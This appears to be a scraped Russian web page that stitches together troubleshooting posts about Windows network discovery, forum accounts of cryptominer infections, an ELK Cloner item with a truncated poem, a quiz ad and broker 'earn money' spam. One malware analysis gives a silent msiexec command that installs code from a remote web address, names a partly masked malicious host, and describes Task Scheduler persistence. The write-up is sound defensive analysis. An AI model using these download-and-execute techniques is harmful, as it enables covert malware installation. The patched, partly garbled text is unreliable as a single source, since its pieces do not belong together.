Windows 2008 r2 как включить сетевое обнаружение в windows

Не включается сетевое обнаружение в Windows Server 2008, Windows 7 и др. Недавно столкнулся с проблемой — перестала работать сеть, обнаружил что на

Не включается сетевое обнаружение в Windows Server 2008, Windows 7 и др.

Недавно столкнулся с проблемой — перестала работать сеть, обнаружил что на Windows server 2008 R2 который был обозревателем сети, по непонятной причине выключено сетевое обнаружение и обратно не включается. Ставишь переключатель на «Включить сетевое обнаружение», жмешь «Сохранить изменения», закрываешь окно, заходишь снова и видишь что сетевое обнаружение отключено.

Из-за этого сеть работает нестабильно, компьютеры не видят друг друга, зайти в сетевое окружение с рабочих станций под Windows XP невозможно, а те что под Windows 7 видят из 30 компьютеров всего 3. По ip адресам конечно все работает, но это совсем не то. Для включения сетевого обнаружения и исправления работы сети, необходимо чтоб были включены несколько служб:

  • DNS-клиент (DNS Client)
  • Обнаружение SSDP (SSDP Discovery)
  • Узел универсальных PNP-устройств (UPnP Device Host)

Заходим в настройку служб:

Находим в списке нужную службу и проверяем чтоб у нее в типе запуска стояло «Автоматически»:

В сетях с рабочей группой последнюю в списке службу «Браузер компьютеров (Computer Browser)», следует запускать на сервере (если он есть) или на 1-2 компьютерах в сети, желательно на тех которые либо включены постоянно, либо те которые включаются первыми и включены большую часть рабочего времени. На остальных компьютерах службу «Браузер компьютеров (Computer Browser)» следует отключить.

Источник

Если не включается «Сетевое обнаружение» в Windows Server 2008 или 2012

Для начала скажу, что я зарабатываю через вот этого брокера , проверен он временем! А вот хороший пример заработка , человек зарабатывает через интернет МНОГО МНОГО МНОГО и показывает все на примерах, переходи и читай! Добавь страницу в закладки. А теперь читаете информацию ниже и пишите свой отзыв

Если у вас не включается сетевое обнаружение в Microsoft Windows Server 2008 R2 или Microsoft Windows Server 2012, то есть это выглядит следующим образом можно поставить галочку на пункт «Включить сетевое обнаружение», но сделанный выбор не сохраняется ни в одном из профилей пользователей.

Получается что галочку мы ставит, но при следующем открытии окна «Дополнительные параметры общего доступа» в «Центре управления сетями и общим доступом» мы видим, что у нас по-прежнему активен выбор «Отключить сетевое обнаружение».

Для решения этой проблемы нам необходимо включить и запустить четыре следующие службы:

DNS-клиент (DNS Client)

Публикация ресурсов обнаружения функции (Function Discovery Resource Publication)

Узел универсальных PNP-устройств (UPnP Device Host)

Обнаружение SSDP (SSDP Discovery)

(Пока оценок нет)

Источник

Интересный вирус майнер или как пропал сетевой доступ на сервере Win Server 2008 r2

Звонит мне клиент и говорит что не может на сервере работать так-как всё жёстко тормозит.

Подключаюсь я вообщем к нему, захожу в диспетчер задач и наблюдаю картину:

Процесс Svshost.exe загружает проц на 80-90%, перехожу в каталог где лежит сие чудо (папка кстати называется 4nationcal). Убиваю процесс, в каталоге 4nationcal удаляю файл и на место одного процесс вылазит 2-3. что делать как быть я хз. Сканировал Касперским, Нодом, Авестом, всё в пустую находит вирус, удаляет но после пары перезагрузок всё возвращается.

Самое страшное что всё кто подключаются по RDP, зависают при входе и дальше темнота, ещё в придачу перестали работать сетевые каталоги и принтеры. Ещё в

Панель управленияВсе элементы панели управленияЦентр управления сетями и общим доступомДополнительные параметры общего доступа не возможно включить сетевое обнаружение.

Вирусу как я понял не нужны права админа т.к. на сервере 1 админ и заходил я под ним примерно пол года назад, до момента тревожного звонка да и нашёл я его в папке загрузок у юзера.

Искал я в интернетах и никто не сталкивался с таким. 2 дня медитации дали свои плоды и я всё же победил его.

1. Удаляем службу HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservices4nationcal

2. Вирус вырубает службы, так что включаем обратно и ставим автовлючение

-DNS-клиент (DNS Client);

-Обнаружение SSDP (SSDP Discovery);

-Публикация ресурсов обнаружения функции (Function Discovery Resource Publication);

-Узел универсальных PNP-устройств (UPnP Device Host).

3.Выключаем службу Агент политики IpSec и на конец появляется сетевой доступ.

Никогда с таким не сталкивался и нигде не нашел как удалить, так что может кому пригодится.

P.S. Мой первый пост, не судите строго

Дубликаты не найдены

ну ты это. покури теневое копирование и знакомство с шифровальщиками для тебя будет не очень жестоким.

у меня на есть Qnap-хранилище, туда бэкапы льются. На серверах самое важное 1с базы, а систему восстановить не проблема

лол, что ты будешь делать с зашифрованными архивами? =)

Архивы делаются каждый день, qnap на линуксе. Я уже сталкивался с шифровальщиком и всё норм пока. тьфу тьфу тьфу

Спасибо. очень выручил. столкнулся с такой-же бедой, после того как дал доступ не обновлённому серваку в интернет. сразу эта гадость прилетела.

Присоединяюсь к благодарностям. Очень выручил. До прочтения не допускал что мои проблемы могут быть связаны с вирусом, так как никто кроме меня не имел доступа. Однако прочитав полез смотреть загрузку процессора и службы и спалил в системной папке IMA исполняемый файл svchost запущенный как служба. Служба эта имела непримечательное название и не имела описания, терялась среди созданных служб сторонних программ с английскими названиями. Ну а дальше аналогично, вырубаем зловредную службу, переименовываем/удаляем файл, проверяем службы по списку.

Компьютер на прокачку

Есть два типа людей. Одни считают, что разбираются в начинках компьютеров и могут их сами собрать/разобрать. Другие правда разбираются! Проверим, какой тип ваш?

Дано: этапы сборки компьютера. Знаете, в каком порядке рекомендуется собирать?

– установить материнскую плату в корпус

– установить систему охлаждения

– вставить процессор в сокет на материнской плате

– подключить провода блока питания к разъемам на материнской плате

Проверить себя и узнать правильный ответ можно в игре. Правда, для этого придется дойти аж до 9 вопроса из 10. Справитесь же?

Как я скрытый майнер искал

Приветствую тех, кто читает. Сижу значит никого не трогаю, вдруг начинает кулер процессорный шуметь. Понимаю, что кто то начал загружать мой процессор. Ну я бегом в диспетчер задач, а там пусто и кулер затих. Через какое-то время ситуация повторяется. Понял, что вирус поймал. Скачал drweb cureit и adw cleaner — результата ноль. Поиск в интернетах результата не дал. Значит будем руками искать.

Для начала глянул в автозапуск и планировщик задач — ничего подозрительного.

Зашел в process explorer и обнаружил такого зверя:

Командная строка, которая постоянно перезапускается, причем с таймаутом, как будто чего-то ждет. Заходим в свойства cmd.exe и видим:

Командая строка запускается с параметром, ведущим к некому DataTM.cmd. Вот код, который лежит в батнике:

А вот и файлы в папке с ним:

XMR майнер. Маскируется в процессах под steam я так понимаю и вырубается как только был включен taskmgr или похожие «диспетчеры задач».

Это не значит, что все майнеры так прячутся, но как один из вариантов. Надеюсь кому-то поможет.

Вот «. » если где забыл поставить.

Первый компьютерный вирус

Поведаю вам о одном из первых вирусов — ELK Cloner , который был обнаружен на компьютерах пользователей, а не в системе, на которой был разработан.
Написан он был 15-летним школьником Ричардом Скрента для Apple II

Вирус не влиял на работу компьютера, за исключением наблюдения за доступом к дискам. Когда происходил доступ к незаражённой дискете, вирус копировал себя туда, заражая её, медленно распространяясь с диска на диск.

Вирус не причинял вреда намеренно, хотя он мог повредить диски , затирая резервные дорожки диска вне зависимости от их содержимого. После каждой 50-й загрузки вирус выводил на экран стишок:

ELK CLONER: THE PROGRAM

WITH A PERSONALITY

IT WILL GET ON ALL YOUR

IT WILL INFILTRATE YOUR

IT WILL STICK TO YOU LIKE

IT WILL MODIFY RAM TOO

SEND IN THE CLONER!

Elk Cloner: программа с индивидуальностью

Она проникнет во все ваши

Она внедрится в ваши чипы

Она прилипнет к вам как

оперативную память
Cloner выходит на охоту

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство «мастеров», думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker’ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ — открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

В автозагрузке, повторюсь всё в порядке:

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов — ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует «Планировщик заданий» (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Дальше я стал копать и выяснил, что бирюзовое окно — это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива — всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это — файл инсталлятора чего-либо:

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Собственно, как оказалось, программа никаких файлов в себе не содержала — только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal’е, и получил следующий результат:

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю — скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз — да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом — если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково — обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется «Info-Zip UnZip», и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик — что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает — распаковываются файлы только оригинальным UnZip’ом при помощи этой команды.
Все файлы внутри архива — исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Этот файл представляет собой json — конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету «Monero». Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера «****Rig»:

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую «работу», и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом — никаких окон).

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

Источник

  • Remove From My Forums

 locked

Включение сетевого обнаружения

  • Вопрос

  • Подскажите пожалуйста как можно включить сетевое обнаружение? Пытался включить через панель управления-центр управления сетями-дополнительные параметры: отметил пункт включить сетевое обнаружение -> сохранить изменения. Но настройки не сохраняются и остаются по умолчанию: отключенное сетевое обнаружение.

Ответы

  • Зайди в «Панель управления — Админстрирование — Брандмауэр Windows в режиме повышенной безопасности».
    Для исходящих и входящих подключений создай предопределённые правила «Сетевое обнаружение».

    Если брандмауэр отключён, то сетевое обнаружение у тебя в данный момент уже работает, ничего включать не нужно.

    • Помечено в качестве ответа

      11 января 2010 г. 6:57

Робот готовый побежать вперед

На днях установил на сервер Windows 2016 и при его настройке не смог активировать «Сетевое обнаружение». Точнее кликаешь на «Включить сетевое обнаружение». Далее ОК. При следующем заходе на эту же станицу – всё по-старому.

Оказалось, что эта проблема не только у серверных систем, но и у пользовательских Windows 10 и предыдущей версии Windows 7.

Все решается достаточно просто. Нужно включить 4 службы и вуаля.

Данная проблема не позволяет полноценно пользоваться компьютером в составе локальной сети, так как не работает обнаружение других машин по сети. Проблема простая, но на ее решение у меня ушло немало времени.

Для того, чтобы включить Сетевое обнаружение в Windows 10, нужно просто включить 4 сетевые службы:

  1. DNS-клиент (DNS Client);
  2. Обнаружение SSDP (SSDP Discovery);
  3. Публикация ресурсов обнаружения функции (Function Discovery Resource Publication);
  4. Узел универсальных PNP-устройств (UPnP Device Host).

На первый взгляд, некоторые службы Windows не относятся к сетевым, но если их включить – это позволит решить проблему. А это главное.

Делается это через Управление компьютером -> Службы. Чтобы включить необходимые службы, нужно установить Тип запуска как Авто и после запустить службу.

Для быстроты можно воспользоваться консольными командами:

sc config Dnscache start= auto
net start Dnscache
sc config SSDPSRV start= auto
net start SSDPSRV
sc config FDResPub start= auto
net start FDResPub
sc config upnphost start= auto
net start upnphost

Включить их также можно, поместив команды в отдельный bat-файл и запустить его на исполнение. Кому как проще.

Почему эти нужные сетевые службы Windows по умолчанию отключены и сетевое обнаружение не включается, остается только гадать.

Теги: сеть

и Настройка

Комментарии

Устройства, подключённые к одной сети, могут пользоваться возможностью сетевого обнаружения, предусмотренную стандартным функционалом OS Windows. Она позволяет другим компьютерам видеть (находить) компьютер пользователя, а также даёт возможность просматривать устройства, которые подсоединены к сети и используют данную функцию.

Сетевое обнаружение в Windows

После включения видимости, система автоматически открывает необходимые порты, изменяет режим сети, а также запускает необходимую службу. Разберёмся, как настроить данную возможность на своём устройстве, а также что делать, если возникли проблемы.

Включение функции сетевого обнаружения

Каждый раз, когда пользователь подключается к новой сети, система предлагает разрешить другим устройствам обнаруживать пользовательский ПК. От этого можно отказаться, либо разрешить при помощи стандартных средств. В дальнейшем, её можно будет активировать/деактивировать при помощи методов, представленных далее в статье.

Рассмотрим способ включения данной возможности через средство, предназначенное для автоматизации системы – системную утилиту Powershell:

Второй метод включения сетевого обнаружения подразумевает ручную смену параметров сети ОС. Для этого, проследуйте простым шагам из инструкции:

  1. Перейдите в «Панель управления» с помощью комбинации клавиш Win + I.
  2. Выберите категорию «Сеть и Интернет», после чего перейдите в подраздел «Wi-Fi» (в левой части окна параметров).
    Раздел «Сеть и Интернет»Переход во вкладку «Wi-Fi»
  3. Из списка «Сопутствующие параметры» выберите пункт «Центр управления сетями и общим доступом».
    Выбор пункта «Центр управления сетями и общим доступом»
  4. Нажмите на кнопку «Изменить дополнительные параметры общего доступа».
    Выбор пункта «Изменить дополнительные параметры общего доступа»
  5. Здесь представлены разные профили для настройки. Мы будем настраивать тот, который является текущим (применяемый к данной локальной сети). Активируйте видимость, поставив точку напротив пункта с соответствующим названием. Также должна быть включена функция общего доступа к файлам и принтерам. Для частной сети можно поставить флажок «Включить автоматическую настройку на сетевых устройствах».
    Изменение дополнительных параметров общего доступа
  6. Сохраните изменения. Если необходимо предоставить доступ к файлам другим компьютерам, нужно включить общий доступ и эти файлы будут видны подключённым устройствам.
    Сохранение изменений дополнительных параметров общего доступа

Для старых операционных систем, вроде XP, данный способ не подойдёт. Чтобы включить сетевое обнаружение в Windows XP, воспользуйтесь следующим алгоритмом действий:

  • Откройте меню «Пуск» с помощью кнопки в нижнем левом углу панели задач.
  • Перейдите в панель управления. Здесь необходимо выбрать категорию «Сеть и подключения к Интернету».
  • Нажмите кнопку «Далее», после чего в мастере настроек укажите, что используется подключение к Интернету через шлюз или через другой компьютер сети (необходимо поставить флажок на второй вариант).
  • Будет запрошен ввод двух параметров: «Описание» и «Имя компьютера». И первое, и второе поле вводится опционально (введённое наименование будет в дальнейшем отображаться всем остальным пользователям локальной сети).
  • Введите рабочую группу (пример «HOME» или «OFFICE»). Все компьютеры, соединенные одной сетью должны использовать одинаковую группу. Не рекомендуется использовать буквы из кириллицы.
  • Выберите пункт «Включить общий доступ к файлам и принтерам», после чего нажмите «Далее», затем ещё раз.
  • Укажите действие к выполнению – «Просто завершить работу мастера». Щёлкните «Далее», после чего нажмите «Готово». Потребуется перезагрузить систему, чтобы изменения вступили в силу.

Отключение сетевого обнаружения

Для того чтобы деактивировать данную функцию, можно воспользоваться программой Windows PowerShell (либо стандартной командной строкой с правами администратора). Данная процедура не займёт много времени, а результат обычно успешный и без сбоев. Сперва необходимо запустить командную строку или Powershell, для этого выполните комбинацию клавиш «Win + R» и запросите запуск объекта «powershell.exe» (либо щёлкните правой кнопкой мыши по меню «Пуск» и выберите пункт «Командная строка (Администратор)», если используется Windows 10).

Команда powershell.exe в Windows

В терминале необходимо ввести следующую команду, после чего нажать Enter:

netsh advfirewall firewall set rule group="Обнаружение сети" new enable=No

Ввод команды для отключения отображения в сети

Если используется английская локализация системы, нужно использовать другую вариацию:

netsh advfirewall firewall set rule group="Network Discovery" new enable=No

Ввод команды на английском для отключения отображения в сети

Также отключить сетевое обнаружение можно через изменение некоторых параметров общего доступа для профилей (метод выключения функции в Windows 7 и выше). Для этого проследуйте следующим шагам:

  1. Откройте меню «Пуск», затем перейдите в панель управления. Также можно использовать горячие клавиши Win + R, затем ввести в строку «shell:::{26EE0668-A00A-44D7-9371-BEB064C98683}» и нажать ОК.
    Переход в Панель управления через Пуск
  2. Укажите тип просмотра «Мелкие значки». Во всём списке элементов необходимо найти «Центр управления сетями и общим доступом», затем зайти туда.
    Выбор параметра «Мелкие значки»Переход в меню «Центр управления сетями и общим доступом»
  3. В левом верхнем меню окна выберите пункт «Изменить дополнительные параметры общего доступа».
    Пункт «Изменить дополнительные параметры общего доступа»
  4. Разверните настройки для текущего профиля. Установите флажок «Отключить сетевое обнаружение», а также «Отключить общий доступ к файлам и принтерам» (если он установлен).
    Отключение сетевого обнаружения компьютера
  5. Сохраните изменения.
    Подтверждение отключения сетевого обнаружения компьютера

Контролировать статус функции можно через приложение «Параметры» в Windows 10. Используйте Win + I для быстрого вызова, затем перейдите в раздел «Сеть и Интернет». Выберите категорию «Удалённый доступ» (если используется не локальное подключение, а Wi-Fi, нужно перейти в одноимённый раздел с помощью левого меню), после чего укажите из списка свою локальную сеть и воспользуйтесь кнопкой «Дополнительные параметры» (высветятся после выбора элемента). В данной вкладке находится единственный переключатель «сделать этот компьютер доступным для обнаружения», переведите его во включённое состояние.

Не включается сетевое обнаружение в Windows

Сперва проверьте текущие настройки брандмауэра. Возможно, установленные параметры не позволяют использовать данную функцию. Перейдите в «Панель управления» любым известным способом (Для Win 10 нужно использовать комбинацию «Win + I»), далее откройте категорию «Система и безопасность», после чего в левом меню нужно выбрать пункт «Разрешить приложение или функцию через брандмауэр». Зайдите в параметры изменения и дайте согласие на изменение системных параметров (если Windows запросит пароль либо подтверждение). Выберите элемент «Сетевое обнаружение» и нажмите ОК. Если используются сторонний фаервол или брандмауэр, рекомендуется проверить параметры и убедиться, что данная функция не запрещена или выключена.

Раздел «Система и безопасность» в Windows 10

Разрешение взаимодействия с приложениями через брандмауэр Windows

Также встроенная возможность не будет функционировать должным образом (либо вовсе будет недоступна), если одна из компонентных служб находится в выключенном состоянии:

  • UPnP Device Host.
  • Публикация ресурсов обнаружения функций (fdPHost).
  • Обнаружение SSDP (SSDPSRV).
  • Клиент DNS.

Если не включается сетевое обнаружение в Windows, перейдите в приложение «Службы». Для этого воспользуйтесь горячими клавишами «Win + R» и запросите запуск «services.msc» (аналогичный результат в Windows 10 принесёт вызов утилиты через меню, открываемое комбинацией «Win + X: здесь необходимо выбрать пункт «Управление компьютером», а затем перейти в «Службы и приложения» -> «Службы»). Найдите в списке первую службу из списка выше, если состояние обозначено как «Отключено», то нужно сделать двойной щелчок по названию, чтобы попасть в настройки. Укажите тип запуска «Автоматически» и запустите службу с помощью специальной кнопки. Проверьте каждую службу из четырёх, и, если будет обнаружена отключённая, проделайте операцию по включению.

Ввод команды services.msc в Windows 10

Узел универсальных PNP-устройств

Запуск службы «Узел универсальных PNP-устройств»

Надеемся, вы разобрались, как включить сетевое обнаружение в Windows 10, 7, XP или других операционных системах данного семейства. Предложенные методы помогут активировать видимость в сети, если оно не работает в вашей операционной системе. Оставляйте ваши отзывы и пожелания с помощью компактной формы, расположенной после статьи.

Понравилась статья? Поделить с друзьями:
  • Windows 2003 server пакет обновлений для windows
  • Windows 2003 server недостаточно системных ресурсов
  • Windows 2008 r2 зависает на добро пожаловать
  • Windows 2003 server upgrade to windows 2008
  • Windows 2008 r2 standard максимальный объем памяти